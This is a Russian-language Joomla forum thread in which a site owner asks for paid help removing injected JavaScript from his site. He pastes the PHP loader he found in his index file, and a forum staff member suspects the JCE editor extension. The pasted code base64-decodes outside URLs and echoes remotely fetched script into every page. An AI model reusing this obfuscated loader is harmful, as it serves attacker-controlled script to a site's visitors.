1. Вниманию авторов!

    Темы из разделов платных услуг удаляются, если:
    • тема создана более 2-х месяцев назад И
    • внутри темы не ведётся активных обсуждений задачи И
    • автор не уведомил администрацию об актуальности задачи.
    Так же тема будет удалена, если:
    • есть подозрение на мошеннические действия со стороны автора;
    • в задаче предлагается оказать содействие в разработке ресурсов, направленность которых противоречит законодательству РФ и моральным устоям здорового общества.
    Скрыть объявление

убрать гадость с сайта

Тема в разделе "АРХИВ", создана пользователем Alex Keyton, 14.02.2013.

  1. Offline

    Alex Keyton Недавно здесь

    Регистрация:
    14.02.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Мужской
    Добрый день!
    случилась беда, на сайте появилась гадость, яндекс ругается.
    гадость вида внизу страниц
    Код (CODE):
    1. <script> url на левый яваскрипт на левом хосте </script>

    сам починить не могу.
    жду помощь и примерную цену за это работу.
    желательно также понять как это попало, и может что-то пофиксить\обновить
     
  2.  
  3. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 464
    Симпатии:
    305
    Пол:
    Мужской
    JCE был установлен? если - ДА, он на 99% виноват.

    Себе чистил почти 8 часов :)
     
  4. Offline

    Alex Keyton Недавно здесь

    Регистрация:
    14.02.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Мужской
    да установлен. вчера через админку его обновил вроде.
    как чистить не пойму.
    вот в индексе
    Код (PHP):
    1. echo $app;
    2. function sql2_safe($in) {
    3.         $rtn = base64_decode($in);
    4.         return $rtn;
    5. }
    6. function collectnewss() {
    7.         $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
    8.         $content = @file_get_contents($get);
    9.         if (!$content)
    10.             echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly90b3VjaG1lLmNoYW5nZWlwLm5hbWUvcnNpemUuanMiPjwvc2NyaXB0Pg==");
    11.         else
    12.             echo $content;

    расшифровка ведет как раз к сайту левому, но я нихрена не програмер если честно, и даже не знаю как корректно хоть тут удалить, потому требуется специалист. Естественно оплачу. (яндекс деньга, в идеале на карту СБ)
     
  5. draff
    Offline

    draff Russian Joomla! Team Команда форума

    Регистрация:
    17.01.2011
    Сообщения:
    6 048
    Симпатии:
    520
    Пол:
    Мужской
  6. Offline

    Alex Keyton Недавно здесь

    Регистрация:
    14.02.2013
    Сообщения:
    0
    Симпатии:
    0
    Пол:
    Мужской
    ответил!
     

Поделиться этой страницей

Загрузка...